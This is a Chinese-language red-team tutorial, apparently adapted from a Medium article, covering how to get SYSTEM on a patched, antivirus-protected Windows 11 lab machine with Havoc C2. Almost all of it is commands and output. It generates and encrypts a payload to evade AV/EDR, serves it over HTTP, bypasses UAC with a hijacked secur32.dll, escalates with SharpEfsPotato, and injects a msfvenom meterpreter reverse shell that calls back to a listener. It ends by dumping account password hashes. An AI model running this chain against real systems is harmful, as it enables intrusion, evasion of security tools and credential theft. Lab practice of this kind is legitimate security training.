Windows11 更新到最新补丁(文章编写时间:2023年8月),安全软件打开
Kali更新:
apt update -y && apt upgrade -y安装设置Havoc
//下载项目cd /opt && git clone https://github.com/HavocFramework/Havoc.git//安装依赖包sudo apt install -y git build-essential apt-utils cmake libfontconfig1 libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev libspdlog-dev python3-dev libboost-all-dev mingw-w64 nasm构建服务端:
cd /opt/Havoc/teamservergo mod download golang.org/x/sysgo mod download github.com/ugorji/gocd ..make ts-build启动服务端:
./havoc server --profile ./profiles/havoc.yaotl
构建客户端:
make client-build启动客户端:
./havoc client单击“新建配置文件”使用默认凭据登录:“5spider:password1234”。
#2、设置监听点击View---Listeners
点击底部的Add
设置新的监听器
#3、生成payload点击Attack-->Payload
选择监听器,设置系统架构和格式,然后点击Generate
保存生成的Payload文件
#4、使用Harriet框架处理Payload绕过 AV/EDRgit clone https://github.com/assume-breach/Home-Grown-Red-Team.gitcd Home-Grown-Red-Team/Harriet sudo bash setup.shbash Harriet.sh选择第一个 Create FUD EXE
然后选择1. Fully-Automated AES Encryption (全自动AES加密)
设置Shellcode文件路径
输入生成的名字
Crypto 解决 pip install pycryptodome
将文件复制到一个新的目录
─$ lsDLL.sh EXE.sh Harriet Harriet.sh README.md setup.sh win11.exe ┌──(kali㉿kali)-[~/Home-Grown-Red-Team/Harriet]└─$ mkdir web ┌──(kali㉿kali)-[~/Home-Grown-Red-Team/Harriet]└─$ cp win11.exe web/启动一个HTTP服务,方便Windows 11上访问和下载这个文件
└─$ cd web ┌──(kali㉿kali)-[~/Home-Grown-Red-Team/Harriet/web]└─$ python3 -m http.server 8080 Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...#5、模拟上线在windows 11下载文件,并运行
#6、获得会话
右键选择Interact 打开C2命令行窗口
#7、枚举使用SharpUp脚本枚举提权向量。
git clone https://github.com/r3motecontrol/Ghostpack-CompiledBinaries.git
通过dotnet命令在 Havoc 会话的内存中运行它。
dotnet inline-execute /home/kali/SharpUp.exe audit
命令完成后,我们看到该用户是本地管理员!如果我们能绕过UAC,就可以获得一个高权限完整的反向 shell。
#8、使用 DLL 劫持绕过Win 11 UAC使用HighBorn脚本,生成恶意 DLL。在 HighBorn 目录中,打开 HighBorn.c 文件。
把可执行文件替换为我们自己的路径
在havoc中执行pwd获取文件路径
保存文件,然后编译它
sudo x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl,-subsystem,windows需要使用HighBorn.exe bypass UAC ,在HighBorn目录中,我们可以使用基于Linux的C#编译器Mono-Complete编译它
sudo apt install mono-complete -ymcs -out:HighBorn.exe HighBorn.cs
编译之前,修改 HighBorn.cs中的dll下载地址
在内存中运行 UAC Bypass
dotnet inline-execute /home/kali/HighBorn.exe
然后回收到一个新的shell
查看当前用户权限
现在我们有一个高完整性信标, 我们可以使用 SharpEfsPotato 工具来获取system权限.你必须在Visual Studio上编译SharpEfsPotato。这是 git 链接。https://github.com/bugch3ck/SharpEfsPotato.git
编译完成后,在Havoc C2 会话内存中执行,使用-p指定二进制文件的位置
dotnet inline-execute /home/kali/SharpEfsPotato.exe -p C:\Users\jack\Downloads\win11.exe
提权成功,获得一个system权限的shell
#9、利用Metasploit进行后渗透通过注入一个meterpreter会话,进行hash转储。
msfvenom -p windows/x64/meterpreter_reverse_http LHOST=192.168.10.140 LPORT=7777 -f raw > /home/kali/output.bin用Harriet处理payload
使用donut转为shellcode
git clone http://github.com/thewover/donut.gitcd donutmake./donut -i ./msfpayload.exe [ Donut shellcode generator v1 (built Aug 19 2023 14:35:50) [ Copyright (c) 2019-2021 TheWover, Odzhan [ Instance type : Embedded [ Module file : "./msfpayload.exe" [ Entropy : Random names + Encryption [ File type : EXE [ Target CPU : x86+amd64 [ AMSI/WDLP/ETW : continue [ PE Headers : overwrite [ Shellcode : "loader.bin" [ Exit : Thread cp loader.bin ~/msf.bin启动msfconsole ,设置监听
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcpsmsf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_httppayload => windows/x64/meterpreter_reverse_httpmsf6 exploit(multi/handler) > set LHOST 192.168.10.140LHOST => 192.168.10.140msf6 exploit(multi/handler) > set LPORT 7777LPORT => 7777msf6 exploit(multi/handler) > run -j[*] Exploit running as background job 1.[*] Exploit completed, but no session was created.msf6 exploit(multi/handler) > [*] Started HTTP reverse handler on http://192.168.10.140:7777通过Havoc注入shellcode
shellcode inject x64 PID# /home/kali/msf.binshellcode inject x64 844 /home/kali/msf.bin
利用后渗透模块dump 用户hash
msf6 exploit(multi/handler) > sessions Active sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN11- 192.168.10.140:7777 -> 192.16 PC 8.10.180:50480 (192.168.10.18 0)msf6 exploit(multi/handler) > sessions 1[*] Starting interaction with 1...meterpreter > background [*] Backgrounding session 1...msf6 exploit(multi/handler) > use post/windows/gather/hashdump msf6 post(windows/gather/hashdump) > set session 1session => 1msf6 post(windows/gather/hashdump) > exploit [*] Obtaining the boot key...[*] Calculating the hboot key using SYSKEY 1043c5689d3d7d604d0209dbd3ad9ee8...[*] Obtaining the user list and keys...[*] Decrypting user keys...[*] Dumping password hints...No users with password hints on this system[*] Dumping password hashes...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:15e6c614c133e20a3e62994373849dee:::jack:1001:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::[*] Post module execution completed
参考文章:https://assume-breach.medium.com/home-grown-red-team-getting-system-on-windows-11-with-havoc-c2-cc4bb089d22
